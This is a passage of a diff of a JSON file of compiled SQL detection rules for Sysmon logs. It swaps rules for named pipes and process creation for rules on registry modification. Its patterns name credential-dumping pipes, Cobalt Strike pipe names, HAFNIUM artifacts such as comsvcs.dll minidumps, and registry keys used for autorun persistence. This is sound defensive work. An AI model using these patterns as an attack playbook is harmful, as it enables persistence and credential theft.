"7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", - "author": "Florian Roth (Nextron Systems)", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown yet" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Add DisallowRun Execution to Registry", + "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "status": "experimental", + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (Image LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (Image LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR Image LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_disallowrun_execution.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", - "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "status": "experimental", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.005" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "PsExec Pipes Artifacts", - "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "status": "test", - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "author": "Nikita Nazarov, oscd.community", + "title": "CurrentVersion Autorun Keys Modification", + "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator activity" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((Details = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND Details LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND Details IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND Details LIKE '%}\\\\python-%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND Details = 'ctfmon.exe /n') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (Details LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((Image LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR Image LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND Details LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" ], - "filename": "pipe_created_psexec_pipes_artifacts.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "title": "Potential Persistence Via Event Viewer Events.asp", + "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" - ], - "falsepositives": [ - "Legitimate Administrator using tool for password recovery" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" - ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" - }, - { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", + "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND Details LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND Details LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (Details = 'http://go.microsoft.com/fwlink/events.asp') OR (Details = '(Empty)')))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_persistence_event_viewer_events_asp.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Modification of Explorer Hidden Keys", + "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "status": "experimental", + "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_hide_file.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "Service Binary in Uncommon Folder", + "id": "277dc340-0540-42e7-8efb-5ff460045e07", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "description": "Detect the creation of a service with a service binary located in a uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_creation_service_uncommon_folder.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "Persistence Via New SIP Provider", + "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1553.003" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Legitimate SIP being registered by the OS or different software." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE 